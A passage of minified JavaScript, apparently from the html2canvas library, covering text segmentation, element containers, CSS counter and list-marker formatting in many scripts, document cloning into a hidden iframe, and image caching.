0,{granularity:"grapheme"});return Array.from(ce.segment(fe)).map(function(ge){return ge.segment})}return function(fe){for(var _e,ce=Jm(fe),ge=[];!(_e=ce.next()).done;)_e.value&&ge.push(_e.value.slice());return ge}(fe)},CC=function(fe,ce){return 0!==ce.letterSpacing?im(fe):function(fe,ce){if(ps.SUPPORT_NATIVE_TEXT_SEGMENTATION){var ge=new Intl.Segmenter(void 0,{granularity:"word"});return Array.from(ge.segment(fe)).map(function(_e){return _e.segment})}return k_(fe,ce)}(fe,ce)},Er=[32,160,4961,65792,65793,4153,4241],k_=function(fe,ce){for(var je,ge=function(fe,ce){var ge=E(fe),_e=co(ge,ce),je=_e[0],tt=_e[1],dt=_e[2],_t=ge.length,gt=0,kt=0;return{next:function(){if(kt>=_t)return{done:!0,value:null};for(var Lt=Pt;kt<_t&&(Lt=Va(ge,tt,je,++kt,dt))===Pt;);if(Lt!==Pt||kt===_t){var Ht=new io(ge,Lt,gt,kt);return gt=kt,{value:Ht,done:!1}}return{done:!0,value:null}}}}(fe,{lineBreak:ce.lineBreak,wordBreak:"break-word"===ce.overflowWrap?"break-word":ce.wordBreak}),_e=[],tt=function(){if(je.value){var dt=je.value.slice(),_t=E(dt),gt="";_t.forEach(function(kt){-1===Er.indexOf(kt)?gt+=g(kt):(gt.length&&_e.push(gt),_e.push(g(kt)),gt="")}),gt.length&&_e.push(gt)}};!(je=ge.next()).done;)tt();return _e},oh=function fe(ce,ge,_e){this.text=BM(ge.data,_e.textTransform),this.textBounds=function(fe,ce,ge,_e){var je=CC(ce,ge),tt=[],dt=0;return je.forEach(function(_t){if(ge.textDecorationLine.length||_t.trim().length>0)if(ps.SUPPORT_RANGE_BOUNDS){var gt=gC(_e,dt,_t.length).getClientRects();if(gt.length>1){var kt=im(_t),Lt=0;kt.forEach(function(ui){tt.push(new Ff(ui,I.fromDOMRectList(fe,gC(_e,Lt+dt,ui.length).getClientRects()))),Lt+=ui.length})}else tt.push(new Ff(_t,I.fromDOMRectList(fe,gt)))}else{var Ht=_e.splitText(_t.length);tt.push(new Ff(_t,FM(fe,_e))),_e=Ht}else ps.SUPPORT_RANGE_BOUNDS||(_e=_e.splitText(_t.length));dt+=_t.length}),tt}(ce,this.text,_e,ge)},BM=function(fe,ce){switch(ce){case 1:return fe.toLowerCase();case 3:return fe.replace(yC,ac);case 2:return fe.toUpperCase();default:return fe}},yC=/(^|\s|:|-|\(|\))([a-z])/g,ac=function(fe,ce,ge){return fe.length>0?ce+ge.toUpperCase():fe},Wc=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this;return je.src=_e.currentSrc||_e.src,je.intrinsicWidth=_e.naturalWidth,je.intrinsicHeight=_e.naturalHeight,je.context.cache.addImage(je.src),je}return de(ce,fe),ce}(fl),P_=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this;return je.canvas=_e,je.intrinsicWidth=_e.width,je.intrinsicHeight=_e.height,je}return de(ce,fe),ce}(fl),rh=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this,tt=new XMLSerializer,dt=Q(ge,_e);return _e.setAttribute("width",dt.width+"px"),_e.setAttribute("height",dt.height+"px"),je.svg="data:image/svg+xml,"+encodeURIComponent(tt.serializeToString(_e)),je.intrinsicWidth=_e.width.baseVal.value,je.intrinsicHeight=_e.height.baseVal.value,je.context.cache.addImage(je.svg),je}return de(ce,fe),ce}(fl),hd=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this;return je.value=_e.value,je}return de(ce,fe),ce}(fl),Zm=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this;return je.start=_e.start,je.reversed="boolean"==typeof _e.reversed&&!0===_e.reversed,je}return de(ce,fe),ce}(fl),O_=[{type:15,flags:0,unit:"px",number:3}],N_=[{type:16,flags:0,number:50}],sh="checkbox",_s="radio",ch="password",Cl=707406591,L_=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this;switch(je.type=_e.type.toLowerCase(),je.checked=_e.checked,je.value=function(fe){var ce=fe.type===ch?new Array(fe.value.length+1).join("\u2022"):fe.value;return 0===ce.length?fe.placeholder||"":ce}(_e),(je.type===sh||je.type===_s)&&(je.styles.backgroundColor=3739148031,je.styles.borderTopColor=je.styles.borderRightColor=je.styles.borderBottomColor=je.styles.borderLeftColor=2779096575,je.styles.borderTopWidth=je.styles.borderRightWidth=je.styles.borderBottomWidth=je.styles.borderLeftWidth=1,je.styles.borderTopStyle=je.styles.borderRightStyle=je.styles.borderBottomStyle=je.styles.borderLeftStyle=1,je.styles.backgroundClip=[0],je.styles.backgroundOrigin=[0],je.bounds=function(fe){return fe.width>fe.height?new I(fe.left+(fe.width-fe.height)/2,fe.top,fe.height,fe.height):fe.width<fe.height?new I(fe.left,fe.top+(fe.height-fe.width)/2,fe.width,fe.width):fe}(je.bounds)),je.type){case sh:je.styles.borderTopRightRadius=je.styles.borderTopLeftRadius=je.styles.borderBottomRightRadius=je.styles.borderBottomLeftRadius=O_;break;case _s:je.styles.borderTopRightRadius=je.styles.borderTopLeftRadius=je.styles.borderBottomRightRadius=je.styles.borderBottomLeftRadius=N_}return je}return de(ce,fe),ce}(fl),fd=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this,tt=_e.options[_e.selectedIndex||0];return je.value=tt&&tt.text||"",je}return de(ce,fe),ce}(fl),N0=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this;return je.value=_e.value,je}return de(ce,fe),ce}(fl),lh=function(fe){function ce(ge,_e){var je=fe.call(this,ge,_e)||this;je.src=_e.src,je.width=parseInt(_e.width,10)||0,je.height=parseInt(_e.height,10)||0,je.backgroundColor=je.styles.backgroundColor;try{if(_e.contentWindow&&_e.contentWindow.document&&_e.contentWindow.document.documentElement){je.tree=Ce(ge,_e.contentWindow.document.documentElement);var tt=_e.contentWindow.document.documentElement?uo(ge,getComputedStyle(_e.contentWindow.document.documentElement).backgroundColor):Nc.TRANSPARENT,dt=_e.contentWindow.document.body?uo(ge,getComputedStyle(_e.contentWindow.document.body).backgroundColor):Nc.TRANSPARENT;je.backgroundColor=Oc(tt)?Oc(dt)?je.styles.backgroundColor:dt:tt}}catch(_t){}return je}return de(ce,fe),ce}(fl),bC=["OL","UL","MENU"],ir=function(fe,ce,ge,_e){for(var je=ce.firstChild,tt=void 0;je;je=tt)if(tt=je.nextSibling,di(je)&&je.data.trim().length>0)ge.textNodes.push(new oh(fe,je,ge.styles));else if(pi(je))if(z_(je)&&je.assignedNodes)je.assignedNodes().forEach(function(_t){return ir(fe,_t,ge,_e)});else{var dt=Se(fe,je);dt.styles.isVisible()&&(nt(je,dt,_e)?dt.flags|=4:Dt(dt.styles)&&(dt.flags|=2),-1!==bC.indexOf(je.tagName)&&(dt.flags|=8),ge.elements.push(dt),je.shadowRoot?ir(fe,je.shadowRoot,dt,_e):!dh(je)&&!Ao(je)&&!mh(je)&&ir(fe,je,dt,_e))}},Se=function(fe,ce){return gc(ce)?new Wc(fe,ce):Fc(ce)?new P_(fe,ce):Ao(ce)?new rh(fe,ce):Ya(ce)?new hd(fe,ce):ca(ce)?new Zm(fe,ce):ka(ce)?new L_(fe,ce):mh(ce)?new fd(fe,ce):dh(ce)?new N0(fe,ce):Po(ce)?new lh(fe,ce):new fl(fe,ce)},Ce=function(fe,ce){var ge=Se(fe,ce);return ge.flags|=4,ir(fe,ce,ge,ge),ge},nt=function(fe,ce,ge){return ce.styles.isPositionedWithZIndex()||ce.styles.opacity<1||ce.styles.isTransformed()||sr(fe)&&ge.styles.isTransparent()},Dt=function(fe){return fe.isPositioned()||fe.isFloating()},di=function(fe){return fe.nodeType===Node.TEXT_NODE},pi=function(fe){return fe.nodeType===Node.ELEMENT_NODE},Hi=function(fe){return pi(fe)&&void 0!==fe.style&&!_a(fe)},_a=function(fe){return"object"==typeof fe.className},Ya=function(fe){return"LI"===fe.tagName},ca=function(fe){return"OL"===fe.tagName},ka=function(fe){return"INPUT"===fe.tagName},Ao=function(fe){return"svg"===fe.tagName},sr=function(fe){return"BODY"===fe.tagName},Fc=function(fe){return"CANVAS"===fe.tagName},At=function(fe){return"VIDEO"===fe.tagName},gc=function(fe){return"IMG"===fe.tagName},Po=function(fe){return"IFRAME"===fe.tagName},Vf=function(fe){return"STYLE"===fe.tagName},dh=function(fe){return"TEXTAREA"===fe.tagName},mh=function(fe){return"SELECT"===fe.tagName},z_=function(fe){return"SLOT"===fe.tagName},uh=function(fe){return fe.tagName.indexOf("-")>0},Cc=function(){function fe(){this.counters={}}return fe.prototype.getCounterValue=function(ce){var ge=this.counters[ce];return ge&&ge.length?ge[ge.length-1]:1},fe.prototype.getCounterValues=function(ce){return this.counters[ce]||[]},fe.prototype.pop=function(ce){var ge=this;ce.forEach(function(_e){return ge.counters[_e].pop()})},fe.prototype.parse=function(ce){var ge=this,_e=ce.counterIncrement,je=ce.counterReset,tt=!0;null!==_e&&_e.forEach(function(_t){var gt=ge.counters[_t.counter];gt&&0!==_t.increment&&(tt=!1,gt.length||gt.push(1),gt[Math.max(0,gt.length-1)]+=_t.increment)});var dt=[];return tt&&je.forEach(function(_t){var gt=ge.counters[_t.counter];dt.push(_t.counter),gt||(gt=ge.counters[_t.counter]=[]),gt.push(_t.reset)}),dt},fe}(),MC={integers:[1e3,900,500,400,100,90,50,40,10,9,5,4,1],values:["M","CM","D","CD","C","XC","L","XL","X","IX","V","IV","I"]},Vc={integers:[9e3,8e3,7e3,6e3,5e3,4e3,3e3,2e3,1e3,900,800,700,600,500,400,300,200,100,90,80,70,60,50,40,30,20,10,9,8,7,6,5,4,3,2,1],values:["\u0554","\u0553","\u0552","\u0551","\u0550","\u054f","\u054e","\u054d","\u054c","\u054b","\u054a","\u0549","\u0548","\u0547","\u0546","\u0545","\u0544","\u0543","\u0542","\u0541","\u0540","\u053f","\u053e","\u053d","\u053c","\u053b","\u053a","\u0539","\u0538","\u0537","\u0536","\u0535","\u0534","\u0533","\u0532","\u0531"]},eE={integers:[1e4,9e3,8e3,7e3,6e3,5e3,4e3,3e3,2e3,1e3,400,300,200,100,90,80,70,60,50,40,30,20,19,18,17,16,15,10,9,8,7,6,5,4,3,2,1],values:["\u05d9\u05f3","\u05d8\u05f3","\u05d7\u05f3","\u05d6\u05f3","\u05d5\u05f3","\u05d4\u05f3","\u05d3\u05f3","\u05d2\u05f3","\u05d1\u05f3","\u05d0\u05f3","\u05ea","\u05e9","\u05e8","\u05e7","\u05e6","\u05e4","\u05e2","\u05e1","\u05e0","\u05de","\u05dc","\u05db","\u05d9\u05d8","\u05d9\u05d7","\u05d9\u05d6","\u05d8\u05d6","\u05d8\u05d5","\u05d9","\u05d8","\u05d7","\u05d6","\u05d5","\u05d4","\u05d3","\u05d2","\u05d1","\u05d0"]},UM={integers:[1e4,9e3,8e3,7e3,6e3,5e3,4e3,3e3,2e3,1e3,900,800,700,600,500,400,300,200,100,90,80,70,60,50,40,30,20,10,9,8,7,6,5,4,3,2,1],values:["\u10f5","\u10f0","\u10ef","\u10f4","\u10ee","\u10ed","\u10ec","\u10eb","\u10ea","\u10e9","\u10e8","\u10e7","\u10e6","\u10e5","\u10e4","\u10f3","\u10e2","\u10e1","\u10e0","\u10df","\u10de","\u10dd","\u10f2","\u10dc","\u10db","\u10da","\u10d9","\u10d8","\u10d7","\u10f1","\u10d6","\u10d5","\u10d4","\u10d3","\u10d2","\u10d1","\u10d0"]},pd=function(fe,ce,ge,_e,je,tt){return fe<ce||fe>ge?V_(fe,je,tt.length>0):_e.integers.reduce(function(dt,_t,gt){for(;fe>=_t;)fe-=_t,dt+=_e.values[gt];return dt},"")+tt},W_=function(fe,ce,ge,_e){var je="";do{ge||fe--,je=_e(fe)+je,fe/=ce}while(fe*ce>=ce);return je},xr=function(fe,ce,ge,_e,je){var tt=ge-ce+1;return(fe<0?"-":"")+(W_(Math.abs(fe),tt,_e,function(dt){return g(Math.floor(dt%tt)+ce)})+je)},hh=function(fe,ce,ge){void 0===ge&&(ge=". ");var _e=ce.length;return W_(Math.abs(fe),_e,!1,function(je){return ce[Math.floor(je%_e)]})+ge},tu=function(fe,ce,ge,_e,je,tt){if(fe<-9999||fe>9999)return V_(fe,4,je.length>0);var dt=Math.abs(fe),_t=je;if(0===dt)return ce[0]+_t;for(var gt=0;dt>0&&gt<=4;gt++){var kt=dt%10;0===kt&&Tr(tt,1)&&""!==_t?_t=ce[kt]+_t:kt>1||1===kt&&0===gt||1===kt&&1===gt&&Tr(tt,2)||1===kt&&1===gt&&Tr(tt,4)&&fe>100||1===kt&&gt>1&&Tr(tt,8)?_t=ce[kt]+(gt>0?ge[gt-1]:"")+_t:1===kt&&gt>0&&(_t=ge[gt-1]+_t),dt=Math.floor(dt/10)}return(fe<0?_e:"")+_t},AC="\ub9c8\uc774\ub108\uc2a4",V_=function(fe,ce,ge){var _e=ge?". ":"",je=ge?"\u3001":"",tt=ge?", ":"",dt=ge?" ":"";switch(ce){case 0:return"\u2022"+dt;case 1:return"\u25e6"+dt;case 2:return"\u25fe"+dt;case 5:var _t=xr(fe,48,57,!0,_e);return _t.length<4?"0"+_t:_t;case 4:return hh(fe,"\u3007\u4e00\u4e8c\u4e09\u56db\u4e94\u516d\u4e03\u516b\u4e5d",je);case 6:return pd(fe,1,3999,MC,3,_e).toLowerCase();case 7:return pd(fe,1,3999,MC,3,_e);case 8:return xr(fe,945,969,!1,_e);case 9:return xr(fe,97,122,!1,_e);case 10:return xr(fe,65,90,!1,_e);case 11:return xr(fe,1632,1641,!0,_e);case 12:case 49:return pd(fe,1,9999,Vc,3,_e);case 35:return pd(fe,1,9999,Vc,3,_e).toLowerCase();case 13:return xr(fe,2534,2543,!0,_e);case 14:case 30:return xr(fe,6112,6121,!0,_e);case 15:return hh(fe,"\u5b50\u4e11\u5bc5\u536f\u8fb0\u5df3\u5348\u672a\u7533\u9149\u620c\u4ea5",je);case 16:return hh(fe,"\u7532\u4e59\u4e19\u4e01\u620a\u5df1\u5e9a\u8f9b\u58ec\u7678",je);case 17:case 48:return tu(fe,"\u96f6\u4e00\u4e8c\u4e09\u56db\u4e94\u516d\u4e03\u516b\u4e5d","\u5341\u767e\u5343\u842c","\u8ca0",je,14);case 47:return tu(fe,"\u96f6\u58f9\u8cb3\u53c3\u8086\u4f0d\u9678\u67d2\u634c\u7396","\u62fe\u4f70\u4edf\u842c","\u8ca0",je,15);case 42:return tu(fe,"\u96f6\u4e00\u4e8c\u4e09\u56db\u4e94\u516d\u4e03\u516b\u4e5d","\u5341\u767e\u5343\u842c","\u8d1f",je,14);case 41:return tu(fe,"\u96f6\u58f9\u8d30\u53c1\u8086\u4f0d\u9646\u67d2\u634c\u7396","\u62fe\u4f70\u4edf\u842c","\u8d1f",je,15);case 26:return tu(fe,"\u3007\u4e00\u4e8c\u4e09\u56db\u4e94\u516d\u4e03\u516b\u4e5d","\u5341\u767e\u5343\u4e07","\u30de\u30a4\u30ca\u30b9",je,0);case 25:return tu(fe,"\u96f6\u58f1\u5f10\u53c2\u56db\u4f0d\u516d\u4e03\u516b\u4e5d","\u62fe\u767e\u5343\u4e07","\u30de\u30a4\u30ca\u30b9",je,7);case 31:return tu(fe,"\uc601\uc77c\uc774\uc0bc\uc0ac\uc624\uc721\uce60\ud314\uad6c","\uc2ed\ubc31\ucc9c\ub9cc",AC,tt,7);case 33:return tu(fe,"\u96f6\u4e00\u4e8c\u4e09\u56db\u4e94\u516d\u4e03\u516b\u4e5d","\u5341\u767e\u5343\u842c",AC,tt,0);case 32:return tu(fe,"\u96f6\u58f9\u8cb3\u53c3\u56db\u4e94\u516d\u4e03\u516b\u4e5d","\u62fe\u767e\u5343",AC,tt,7);case 18:return xr(fe,2406,2415,!0,_e);case 20:return pd(fe,1,19999,UM,3,_e);case 21:return xr(fe,2790,2799,!0,_e);case 22:return xr(fe,2662,2671,!0,_e);case 22:return pd(fe,1,10999,eE,3,_e);case 23:return hh(fe,"\u3042\u3044\u3046\u3048\u304a\u304b\u304d\u304f\u3051\u3053\u3055\u3057\u3059\u305b\u305d\u305f\u3061\u3064\u3066\u3068\u306a\u306b\u306c\u306d\u306e\u306f\u3072\u3075\u3078\u307b\u307e\u307f\u3080\u3081\u3082\u3084\u3086\u3088\u3089\u308a\u308b\u308c\u308d\u308f\u3090\u3091\u3092\u3093");case 24:return hh(fe,"\u3044\u308d\u306f\u306b\u307b\u3078\u3068\u3061\u308a\u306c\u308b\u3092\u308f\u304b\u3088\u305f\u308c\u305d\u3064\u306d\u306a\u3089\u3080\u3046\u3090\u306e\u304a\u304f\u3084\u307e\u3051\u3075\u3053\u3048\u3066\u3042\u3055\u304d\u3086\u3081\u307f\u3057\u3091\u3072\u3082\u305b\u3059");case 27:return xr(fe,3302,3311,!0,_e);case 28:return hh(fe,"\u30a2\u30a4\u30a6\u30a8\u30aa\u30ab\u30ad\u30af\u30b1\u30b3\u30b5\u30b7\u30b9\u30bb\u30bd\u30bf\u30c1\u30c4\u30c6\u30c8\u30ca\u30cb\u30cc\u30cd\u30ce\u30cf\u30d2\u30d5\u30d8\u30db\u30de\u30df\u30e0\u30e1\u30e2\u30e4\u30e6\u30e8\u30e9\u30ea\u30eb\u30ec\u30ed\u30ef\u30f0\u30f1\u30f2\u30f3",je);case 29:return hh(fe,"\u30a4\u30ed\u30cf\u30cb\u30db\u30d8\u30c8\u30c1\u30ea\u30cc\u30eb\u30f2\u30ef\u30ab\u30e8\u30bf\u30ec\u30bd\u30c4\u30cd\u30ca\u30e9\u30e0\u30a6\u30f0\u30ce\u30aa\u30af\u30e4\u30de\u30b1\u30d5\u30b3\u30a8\u30c6\u30a2\u30b5\u30ad\u30e6\u30e1\u30df\u30b7\u30f1\u30d2\u30e2\u30bb\u30b9",je);case 34:return xr(fe,3792,3801,!0,_e);case 37:return xr(fe,6160,6169,!0,_e);case 38:return xr(fe,4160,4169,!0,_e);case 39:return xr(fe,2918,2927,!0,_e);case 40:return xr(fe,1776,1785,!0,_e);case 43:return xr(fe,3046,3055,!0,_e);case 44:return xr(fe,3174,3183,!0,_e);case 45:return xr(fe,3664,3673,!0,_e);case 46:return xr(fe,3872,3881,!0,_e);default:return xr(fe,48,57,!0,_e)}},GM="data-html2canvas-ignore",B_=function(){function fe(ce,ge,_e){if(this.context=ce,this.options=_e,this.scrolledElements=[],this.referenceElement=ge,this.counters=new Cc,this.quoteDepth=0,!ge.ownerDocument)throw new Error("Cloned element does not have an owner document");this.documentElement=this.cloneNode(ge.ownerDocument.documentElement,!1)}return fe.prototype.toIFrame=function(ce,ge){var _e=this,je=iE(ce,ge);if(!je.contentWindow)return Promise.reject("Unable to find iframe window");var tt=ce.defaultView.pageXOffset,dt=ce.defaultView.pageYOffset,_t=je.contentWindow,gt=_t.document,kt=QM(je).then(function(){return j(_e,void 0,void 0,function(){var Lt,Ht;return $(this,function(ui){switch(ui.label){case 0:return this.scrolledElements.forEach(L0),_t&&(_t.scrollTo(ge.left,ge.top),/(iPad|iPhone|iPod)/g.test(navigator.userAgent)&&(_t.scrollY!==ge.top||_t.scrollX!==ge.left)&&(this.context.logger.warn("Unable to restore scroll position for cloned document"),this.context.windowBounds=this.context.windowBounds.add(_t.scrollX-ge.left,_t.scrollY-ge.top,0,0))),Lt=this.options.onclone,void 0===(Ht=this.clonedReferenceElement)?[2,Promise.reject("Error finding the "+this.referenceElement.nodeName+" in the cloned document")]:gt.fonts&&gt.fonts.ready?[4,gt.fonts.ready]:[3,2];case 1:ui.sent(),ui.label=2;case 2:return/(AppleWebKit)/g.test(navigator.userAgent)?[4,z7(gt)]:[3,4];case 3:ui.sent(),ui.label=4;case 4:return"function"==typeof Lt?[2,Promise.resolve().then(function(){return Lt(gt,Ht)}).then(function(){return je})]:[2,je]}})})});return gt.open(),gt.write(aE(document.doctype)+"<html></html>"),$M(this.referenceElement.ownerDocument,tt,dt),gt.replaceChild(gt.adoptNode(this.documentElement),gt.documentElement),gt.close(),kt},fe.prototype.createElementClone=function(ce){if(Of(ce,2),Fc(ce))return this.createCanvasClone(ce);if(At(ce))return this.createVideoClone(ce);if(Vf(ce))return this.createStyleClone(ce);var ge=ce.cloneNode(!1);return gc(ge)&&(gc(ce)&&ce.currentSrc&&ce.currentSrc!==ce.src&&(ge.src=ce.currentSrc,ge.srcset=""),"lazy"===ge.loading&&(ge.loading="eager")),uh(ge)?this.createCustomElementClone(ge):ge},fe.prototype.createCustomElementClone=function(ce){var ge=document.createElement("html2canvascustomelement");return H_(ce.style,ge),ge},fe.prototype.createStyleClone=function(ce){try{var ge=ce.sheet;if(ge&&ge.cssRules){var _e=[].slice.call(ge.cssRules,0).reduce(function(tt,dt){return dt&&"string"==typeof dt.cssText?tt+dt.cssText:tt},""),je=ce.cloneNode(!1);return je.textContent=_e,je}}catch(tt){if(this.context.logger.error("Unable to access cssRules property",tt),"SecurityError"!==tt.name)throw tt}return ce.cloneNode(!1)},fe.prototype.createCanvasClone=function(ce){var ge;if(this.options.inlineImages&&ce.ownerDocument){var _e=ce.ownerDocument.createElement("img");try{return _e.src=ce.toDataURL(),_e}catch(kt){this.context.logger.info("Unable to inline canvas contents, canvas is tainted",ce)}}var je=ce.cloneNode(!1);try{je.width=ce.width,je.height=ce.height;var tt=ce.getContext("2d"),dt=je.getContext("2d");if(dt)if(!this.options.allowTaint&&tt)dt.putImageData(tt.getImageData(0,0,ce.width,ce.height),0,0);else{var _t=null!==(ge=ce.getContext("webgl2"))&&void 0!==ge?ge:ce.getContext("webgl");if(_t){var gt=_t.getContextAttributes();!1===(null==gt?void 0:gt.preserveDrawingBuffer)&&this.context.logger.warn("Unable to clone WebGL context as it has preserveDrawingBuffer=false",ce)}dt.drawImage(ce,0,0)}return je}catch(kt){this.context.logger.info("Unable to clone canvas as it is tainted",ce)}return je},fe.prototype.createVideoClone=function(ce){var ge=ce.ownerDocument.createElement("canvas");ge.width=ce.offsetWidth,ge.height=ce.offsetHeight;var _e=ge.getContext("2d");try{return _e&&(_e.drawImage(ce,0,0,ge.width,ge.height),this.options.allowTaint||_e.getImageData(0,0,ge.width,ge.height)),ge}catch(tt){this.context.logger.info("Unable to clone video as it is tainted",ce)}var je=ce.ownerDocument.createElement("canvas");return je.width=ce.offsetWidth,je.height=ce.offsetHeight,je},fe.prototype.appendChildNode=function(ce,ge,_e){(!pi(ge)||!function(fe){return"SCRIPT"===fe.tagName}(ge)&&!ge.hasAttribute(GM)&&("function"!=typeof this.options.ignoreElements||!this.options.ignoreElements(ge)))&&(!this.options.copyStyles||!pi(ge)||!Vf(ge))&&ce.appendChild(this.cloneNode(ge,_e))},fe.prototype.cloneChildNodes=function(ce,ge,_e){for(var je=this,tt=ce.shadowRoot?ce.shadowRoot.firstChild:ce.firstChild;tt;tt=tt.nextSibling)if(pi(tt)&&z_(tt)&&"function"==typeof tt.assignedNodes){var dt=tt.assignedNodes();dt.length&&dt.forEach(function(_t){return je.appendChildNode(ge,_t,_e)})}else this.appendChildNode(ge,tt,_e)},fe.prototype.cloneNode=function(ce,ge){if(di(ce))return document.createTextNode(ce.data);if(!ce.ownerDocument)return ce.cloneNode(!1);var _e=ce.ownerDocument.defaultView;if(_e&&pi(ce)&&(Hi(ce)||_a(ce))){var je=this.createElementClone(ce);je.style.transitionProperty="none";var tt=_e.getComputedStyle(ce),dt=_e.getComputedStyle(ce,":before"),_t=_e.getComputedStyle(ce,":after");this.referenceElement===ce&&Hi(je)&&(this.clonedReferenceElement=je),sr(je)&&z0(je);var gt=this.counters.parse(new Ju(this.context,tt)),kt=this.resolvePseudoContent(ce,je,dt,fh.BEFORE);uh(ce)&&(ge=!0),At(ce)||this.cloneChildNodes(ce,je,ge),kt&&je.insertBefore(kt,je.firstChild);var Lt=this.resolvePseudoContent(ce,je,_t,fh.AFTER);return Lt&&je.appendChild(Lt),this.counters.pop(gt),(tt&&(this.options.copyStyles||_a(ce))&&!Po(ce)||ge)&&H_(tt,je),(0!==ce.scrollTop||0!==ce.scrollLeft)&&this.scrolledElements.push([je,ce.scrollLeft,ce.scrollTop]),(dh(ce)||mh(ce))&&(dh(je)||mh(je))&&(je.value=ce.value),je}return ce.cloneNode(!1)},fe.prototype.resolvePseudoContent=function(ce,ge,_e,je){var tt=this;if(_e){var dt=_e.content,_t=ge.ownerDocument;if(_t&&dt&&"none"!==dt&&"-moz-alt-content"!==dt&&"none"!==_e.display){this.counters.parse(new Ju(this.context,_e));var gt=new dC(this.context,_e),kt=_t.createElement("html2canvaspseudoelement");H_(_e,kt),gt.content.forEach(function(Ht){if(0===Ht.type)kt.appendChild(_t.createTextNode(Ht.value));else if(22===Ht.type){var ui=_t.createElement("img");ui.src=Ht.value,ui.style.opacity="1",kt.appendChild(ui)}else if(18===Ht.type){if("attr"===Ht.name){var Ki=Ht.values.filter(tn);Ki.length&&kt.appendChild(_t.createTextNode(ce.getAttribute(Ki[0].value)||""))}else if("counter"===Ht.name){var Ni=Ht.values.filter(Wl),dn=Ni[1];if((Ui=Ni[0])&&tn(Ui)){var ta=tt.counters.getCounterValue(Ui.value),na=dn&&tn(dn)?Sf.parse(tt.context,dn.value):3;kt.appendChild(_t.createTextNode(V_(ta,na,!1)))}}else if("counters"===Ht.name){var Ui,To=Ht.values.filter(Wl),Mn=To[1];if(dn=To[2],(Ui=To[0])&&tn(Ui)){var qa=tt.counters.getCounterValues(Ui.value),Qi=dn&&tn(dn)?Sf.parse(tt.context,dn.value):3,ro=Mn&&0===Mn.type?Mn.value:"",Yn=qa.map(function(qc){return V_(qc,Qi,!1)}).join(ro);kt.appendChild(_t.createTextNode(Yn))}}}else if(20===Ht.type)switch(Ht.value){case"open-quote":kt.appendChild(_t.createTextNode(rr(gt.quotes,tt.quoteDepth++,!0)));break;case"close-quote":kt.appendChild(_t.createTextNode(rr(gt.quotes,--tt.quoteDepth,!1)));break;default:kt.appendChild(_t.createTextNode(Ht.value))}}),kt.className=EC+" "+DC;var Lt=je===fh.BEFORE?" "+EC:" "+DC;return _a(ge)?ge.className.baseValue+=Lt:ge.className+=Lt,kt}}},fe.destroy=function(ce){return!!ce.parentNode&&(ce.parentNode.removeChild(ce),!0)},fe}(),fh=(()=>{return(fe=fh||(fh={}))[fe.BEFORE=0]="BEFORE",fe[fe.AFTER=1]="AFTER",fh;var fe})(),iE=function(fe,ce){var ge=fe.createElement("iframe");return ge.className="html2canvas-container",ge.style.visibility="hidden",ge.style.position="fixed",ge.style.left="-10000px",ge.style.top="0px",ge.style.border="0",ge.width=ce.width.toString(),ge.height=ce.height.toString(),ge.scrolling="no",ge.setAttribute(GM,"true"),fe.body.appendChild(ge),ge},jM=function(fe){return new Promise(function(ce){fe.complete?ce():fe.src?(fe.onload=ce,fe.onerror=ce):ce()})},z7=function(fe){return Promise.all([].slice.call(fe.images,0).map(jM))},QM=function(fe){return new Promise(function(ce,ge){var _e=fe.contentWindow;if(!_e)return ge("No window assigned for iframe");var je=_e.document;_e.onload=fe.onload=function(){_e.onload=fe.onload=null;var tt=setInterval(function(){je.body.childNodes.length>0&&"complete"===je.readyState&&(clearInterval(tt),ce(fe))},50)}})},W7=["all","d","content"],H_=function(fe,ce){for(var ge=fe.length-1;ge>=0;ge--){var _e=fe.item(ge);-1===W7.indexOf(_e)&&ce.style.setProperty(_e,fe.getPropertyValue(_e))}return ce},aE=function(fe){var ce="";return fe&&(ce+="<!DOCTYPE ",fe.name&&(ce+=fe.name),fe.internalSubset&&(ce+=fe.internalSubset),fe.publicId&&(ce+='"'+fe.publicId+'"'),fe.systemId&&(ce+='"'+fe.systemId+'"'),ce+=">"),ce},$M=function(fe,ce,ge){fe&&fe.defaultView&&(ce!==fe.defaultView.pageXOffset||ge!==fe.defaultView.pageYOffset)&&fe.defaultView.scrollTo(ce,ge)},L0=function(fe){var ce=fe[0],_e=fe[2];ce.scrollLeft=fe[1],ce.scrollTop=_e},EC="___html2canvas___pseudoelement_before",DC="___html2canvas___pseudoelement_after",nE='{\n    content: "" !important;\n    display: none !important;\n}',z0=function(fe){xC(fe,"."+EC+":before"+nE+"\n         ."+DC+":after"+nE)},xC=function(fe,ce){var ge=fe.ownerDocument;if(ge){var _e=ge.createElement("style");_e.textContent=ce,fe.appendChild(_e)}},wC=function(){function fe(){}return fe.getOrigin=function(ce){var ge=fe._link;return ge?(ge.href=ce,ge.href=ge.href,ge.protocol+ge.hostname+ge.port):"about:blank"},fe.isSameOrigin=function(ce){return fe.getOrigin(ce)===fe._origin},fe.setContext=function(ce){fe._link=ce.document.createElement("a"),fe._origin=fe.getOrigin(ce.location.href)},fe._origin="about:blank",fe}(),KM=function(){function fe(ce,ge){this.context=ce,this._options=ge,this._cache={}}return fe.prototype.addImage=function(ce){var ge=Promise.resolve();return this.has(ce)||(RC(ce)||rE(ce))&&(this._cache[ce]=this.loadImage(ce)).catch(function(){}),ge},fe.prototype.match=function(ce){return this._cache[ce]},fe.prototype.loadImage=function(ce){return j(this,void 0,void 0,function(){var ge,_e,je,tt,dt=this;return $(this,function(_t){switch(_t.label){case 0:return ge=wC.isSameOrigin(ce),_e=!IC(ce)&&!0===this._options.useCORS&&ps.SUPPORT_CORS_IMAGES&&!ge,je=!IC(ce)&&!ge&&!RC(ce)&&"string"==typeof this._options.proxy&&ps.SUPPORT_CORS_XHR&&!_e,ge||!1!==this._options.allowTaint||IC(ce)||RC(ce)||je||_e?(tt=ce,je?[4,this.proxy(tt)]:[3,2]):[2];case 1:tt=_t.sent(),_t.label=2;case 2:return this.context.logger.debug("Added image "+ce.substring(0,256)),[4,new Promise(function(gt,kt){var Lt=new Image;Lt.onload=function(){return 